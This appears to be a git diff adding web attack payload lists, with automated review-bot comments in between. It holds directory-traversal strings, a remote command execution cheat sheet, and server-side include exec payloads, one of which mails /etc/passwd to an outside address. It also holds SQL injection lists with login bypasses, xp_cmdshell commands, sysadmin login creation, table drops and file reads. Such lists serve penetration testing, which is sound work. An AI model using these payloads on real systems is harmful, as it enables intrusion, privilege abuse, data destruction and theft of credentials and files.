/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..//{FILE}
|
||||
/..//..//{FILE}
|
||||
/..//..//..//{FILE}
|
||||
/..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//..//..//{FILE}
|
||||
/..///{FILE}
|
||||
/..///..///{FILE}
|
||||
/..///..///..///{FILE}
|
||||
/..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///..///..///{FILE}
|
||||
/..\\{FILE}
|
||||
/..\\..\\{FILE}
|
||||
/..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/./\/./{FILE}
|
||||
/./\/././\/./{FILE}
|
||||
/./\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
|
||||
/./../{FILE}
|
||||
/./.././../{FILE}
|
||||
/./.././.././../{FILE}
|
||||
/./.././.././.././../{FILE}
|
||||
/./.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././.././../{FILE}
|
||||
/.\..\{FILE}
|
||||
/.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.//..//{FILE}
|
||||
/.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/../{FILE}
|
||||
/../..//{FILE}
|
||||
/../..//../{FILE}
|
||||
/../..//../..//{FILE}
|
||||
/../..//../..//../{FILE}
|
||||
/../..//../..//../..//{FILE}
|
||||
/../..//../..//../..//../{FILE}
|
||||
/../..//../..//../..//../..//{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\\{FILE}
|
||||
/..\..\\..\{FILE}
|
||||
/..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\{FILE}
|
||||
/..///{FILE}
|
||||
/../..///{FILE}
|
||||
/../..//..///{FILE}
|
||||
/../..//../..///{FILE}
|
||||
/../..//../..//..///{FILE}
|
||||
/../..//../..//../..///{FILE}
|
||||
/../..//../..//../..//..///{FILE}
|
||||
/../..//../..//../..//../..///{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\..\\\{FILE}
|
||||
/..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
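Review bot: this part of the traversal list repeats entries exactly: `/..///{FILE}` opens the `/..///` run and appears again at the start of the later `/../..///` run, and `/..\\\{FILE}` is repeated the same way at the start of the `/..\..\\\` run. Duplicates add requests and log noise without adding coverage, so de-duplicate the file when it is generated and keep each depth series starting at a distinct first entry.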
3
attack-payloads/rfi/readme.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
Other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
178
attack-payloads/rfi/rfi-cheatsheet.html
Normal file
|
@ -0,0 +1,178 @@
|
|||
<html>
|
||||
<head>
|
||||
<title>Web Hacking. cd hack. cs hack. hacked godzilla. </title>
|
||||
<META http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
||||
<META NAME="robots" CONTENT="index all, follow">
|
||||
</head>
|
||||
|
||||
<div class=Section1>
|
||||
|
||||
<p class=doctext><span lang=EN-GB>This table provides a handy list of
|
||||
techniques that can be used for remote command execution, by language.</span></p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><a name=app03table01></a><span
|
||||
lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table: Remote
|
||||
Command Execution Cheat Sheet</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Web Application Environment</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Source Code</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Additional Information</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Java Servlet </span></p>
|
||||
</td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><span lang=EN-GB>class Example</span></pre><pre><span
|
||||
lang=EN-GB> extends HTTPServlet</span></pre><pre><span lang=EN-GB>{</span></pre><pre><span
|
||||
lang=EN-GB> .</span></pre><pre><span lang=EN-GB> .</span></pre><pre><span
|
||||
lang=EN-GB> .</span></pre><pre><span lang=EN-GB> void function()</span></pre><pre><span
|
||||
lang=EN-GB> {</span></pre><pre><span lang=EN-GB>Runtime r = Runtime.getRuntime();</span></pre><pre><span
|
||||
lang=EN-GB>Process p = r.exec("<span class=docemphasis1><command></span>",</span></pre><pre><span
|
||||
class=docemphasis1><arguments></span>);</pre><pre>}</pre><pre> .</pre><pre> .</pre><pre> .</pre><pre>}</pre></td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
|
||||
target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Java Server Pages (JSP) </span></p>
|
||||
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><%</pre><pre> Runtime r =</pre><pre>Runtime.getRuntime();</pre><pre> Process p =</pre><pre>r.exec("<span
|
||||
class=docemphasis1><command></span>",</pre><pre><span
|
||||
class=docemphasis1><arguments></span>);</pre><pre>%></pre></td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
|
||||
target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
|
||||
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Active Server Pages (ASP) </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=doctext><span lang=EN-GB>If Windows Scripting Host</span></p>
|
||||
<p class=doctext><span lang=EN-GB>is installed on the target</span></p>
|
||||
<p class=doctext><span lang=EN-GB>system:</span></p>
|
||||
<pre><span lang=EN-GB><%</span></pre><pre><span lang=EN-GB> Set wsh =</span></pre><pre><span
|
||||
lang=EN-GB>Server.CreateObject("Wscript.shell")</span></pre><pre><span
|
||||
lang=EN-GB> </span>wsh.run("<span class=docemphasis1><command></span>");</pre><pre>%></pre></td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="zhttp://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp"
|
||||
target="_blank"><span style='color:#003399'>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp</span></a>
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PERL </span></p>
|
||||
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>In PERL, commands are executed by wrapping
|
||||
them with the backtick symbol (`)</span></p>
|
||||
<p class=doctext><span lang=EN-GB>$result = `<span class=docemphasis1><command></span>`;</span></p>
|
||||
<p class=doctext><span lang=EN-GB>or</span></p>
|
||||
<p class=doctext><span lang=EN-GB>system("<span class=docemphasis1><command></span>");</span></p>
|
||||
|
||||
<p class=doctext>or</p>
|
||||
<p class=doctext>open(IN, "<span class=docemphasis1><command></span>
|
||||
|");</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.perldoc.com/perl5.6/pod/perlfunc.html"
|
||||
target="_blank"><span style='color:#003399'>http://www.perldoc.com/perl5.6/pod/perlfunc.html</span></a>
|
||||
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PHP </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=doctext><span lang=EN-GB><? system("<span
|
||||
class=docemphasis1><command></span>") ?></span></p>
|
||||
<p class=doctext><span lang=EN-GB>or</span></p>
|
||||
<p class=doctext><span lang=EN-GB><? shell_exec("<span
|
||||
class=docemphasis1><command></span>") ?></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.php.net/manual/en/function.shell-exec.php"
|
||||
target="_blank"><span lang=EN-GB style='color:#003399'>http://www.php.net/manual/en/function.shell-exec.php</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>MS SQL </span></p>
|
||||
</td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>EXEC master..xp_cmdshell" <command>" </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
<br>
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
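Review bot: the markup is not well-formed and one reference link is broken: the file closes with `</body>` but never opens `<body>` after `</head>`, and the ASP row's href reads `zhttp://msdn.microsoft.com/...` with a stray leading `z` while its link text carries the correct URL. The file is also added as `attack-payloads/rfi/rfi-cheatsheet.html`, yet its own caption is "Table: Remote Command Execution Cheat Sheet" and its `<title>` has nothing to do with the content; rename or retitle it so the path tells a reader what the table covers.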
2246
attack-payloads/rfi/rfi.txt
Normal file
File diff suppressed because it is too large
|
@ -0,0 +1,5 @@
|
|||
# includes work by Foobar@email.de
|
||||
<!--#exec cmd="/bin/ls /" --><br/>
|
||||
<!--#exec cmd="cat /etc/passwd" --><br/>
|
||||
<!--#exec cmd="find / -name *.* -print" --><br/>
|
||||
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
|
|
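Review bot: the last `<!--#exec cmd=...` entry hard-codes a third-party mailbox, `Foobar@email.de`, and carries mail-client autolink residue (`<mailto:Foobar@email.de>`) inside the command string. A list like this gets replayed verbatim against systems under test, so any entry that takes effect would direct that system's data to an address outside the engagement; replace the address with a placeholder token in the style of the `{FILE}` token the traversal lists use, and keep the credit only in the `#` comment line.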
@ -0,0 +1,11 @@
|
|||
# contains statements from jbrofuzz (13 April 2010)
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
create user name identified by 'pass123'
|
||||
create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||||
' ; drop table temp --
|
||||
exec sp_addlogin 'name' , 'password'
|
||||
exec sp_addsrvrolemember 'name' , 'sysadmin'
|
||||
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
|
||||
grant connect to name; grant resource to name;
|
||||
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||||
|
|
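Review bot: the final `insert into users(login, password, level) values(` entry stops after `char(0x64)` with its parenthesis still open, so it looks cut off during import rather than intentionally partial. Restore it from the jbrofuzz source credited in the header comment or drop it, so a result recorded against this line is not misread. The `xp_cmdshell` entry also hard-codes `10.10.1.2`; a placeholder would keep test runs from sending traffic to whatever holds that address on the tester's network.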
@ -0,0 +1,57 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||
||6
|
||||
'||'6
|
||||
(||6)
|
||||
' or 1=1--
|
||||
or 1=1
|
||||
' or '1'='1
|
||||
; or '1'='1'
|
||||
" or isNULL(1/0) /*
|
||||
' or '7659'='7659
|
||||
" or isNULL(1/0) /*
|
||||
' --
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or 1=1 /*
|
||||
or 1=1--
|
||||
' or 'a'='a
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
admin' or '
|
||||
' select * from information_schema.tables--
|
||||
) union select * from information_schema.tables;
|
||||
' having 1=1--
|
||||
' having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
||||
' or 1 in (select @@version)--
|
||||
' union all select @@version--
|
||||
' or 'unusual' = 'unusual'
|
||||
' or 'something' = 'some'+'thing'
|
||||
' or 'text' = n'text'
|
||||
' or 'something' like 'some%'
|
||||
' or 2 > 1
|
||||
' or 'text' > 't'
|
||||
' or 'whatever' in ('whatever')
|
||||
' or 2 between 1 and 3
|
||||
' or username like char(37);
|
||||
' union select * from users where login = char(114,111,111,116);
|
||||
' union select
|
||||
password:*/=1--
|
||||
uni/**/on sel/**/ect
|
||||
'; execute immediate 'sel' || 'ect us' || 'er'
|
||||
'; exec ('sel' + 'ect us' + 'er')
|
||||
'/**/or/**/1/**/=/**/1
|
||||
' or 1/*
|
||||
or isNULL(1/0) /*
|
||||
' or '7659'='7659
|
||||
" or isNULL(1/0) /*
|
||||
' -- &password=
|
||||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||||
@var select @var as var into temp end --
|
||||
' and 1 in (select var from temp)--
|
||||
' union select 1,load_file('/etc/passwd'),1,1,1;
|
||||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
||||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
||||
|
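Review bot: several entries in this file are exact repeats (`' or 1=1--`, `' having 1=1--` and `' or '7659'='7659` each appear twice, and `" or isNULL(1/0) /*` three times), and the `'; begin declare @var ...` statement is split over two lines, ending at `where login >` and resuming at `@var select @var as var into temp end --`. A consumer that reads one entry per line will send the two halves as separate strings, and the repeats inflate request counts and any per-entry statistics; join the wrapped statement onto one line and de-duplicate before committing.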
144
attack-payloads/sql-injection/detect-generic/sql-injection.txt
Normal file
|
@ -0,0 +1,144 @@
|
|||
# to attempt with ids/waf evasion try like
|
||||
# /index.aspx?page=select 1&page=2,3 from table where id=1
|
||||
'sqlvuln
|
||||
'+sqlvuln
|
||||
sqlvuln;
|
||||
(sqlvuln)
|
||||
a' or 1=1--
|
||||
"a"" or 1=1--"
|
||||
or a = a
|
||||
a' or 'a' = 'a
|
||||
1 or 1=1
|
||||
a' waitfor delay '0:0:10'--
|
||||
1 waitfor delay '0:0:10'--
|
||||
declare @q nvarchar (4000) select @q =
|
||||
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
||||
0
|
||||
031003000270000
|
||||
declare @s varchar(22) select @s =
|
||||
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
||||
exec(@s)
|
||||
a'
|
||||
?
|
||||
' or 1=1
|
||||
‘ or 1=1 --
|
||||
x' AND userid IS NULL; --
|
||||
x' AND email IS NULL; --
|
||||
anything' OR 'x'='x
|
||||
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
||||
x' AND members.email IS NULL; --
|
||||
x' OR full_name LIKE '%Bob%
|
||||
23 OR 1=1
|
||||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||||
'
|
||||
'%20or%20''='
|
||||
'%20or%20'x'='x
|
||||
%20or%20x=x
|
||||
')%20or%20('x'='x
|
||||
0 or 1=1
|
||||
' or 0=0 --
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
' or 0=0 #
|
||||
or 0=0 #"
|
||||
or 0=0 #
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or '1'='1'--
|
||||
' or 1 --'
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 1=1 or ''='
|
||||
or 1=1 or ""=
|
||||
' or a=a--
|
||||
or a=a
|
||||
') or ('a'='a
|
||||
) or (a=a
|
||||
hi or a=a
|
||||
hi or 1=1 --"
|
||||
hi' or 1=1 --
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
"hi"") or (""a""=""a"
|
||||
'hi' or 'x'='x';
|
||||
@variable
|
||||
,@variable
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
select
|
||||
insert
|
||||
as
|
||||
or
|
||||
procedure
|
||||
limit
|
||||
order by
|
||||
asc
|
||||
desc
|
||||
delete
|
||||
update
|
||||
distinct
|
||||
having
|
||||
truncate
|
||||
replace
|
||||
like
|
||||
handler
|
||||
bfilename
|
||||
' or username like '%
|
||||
' or uname like '%
|
||||
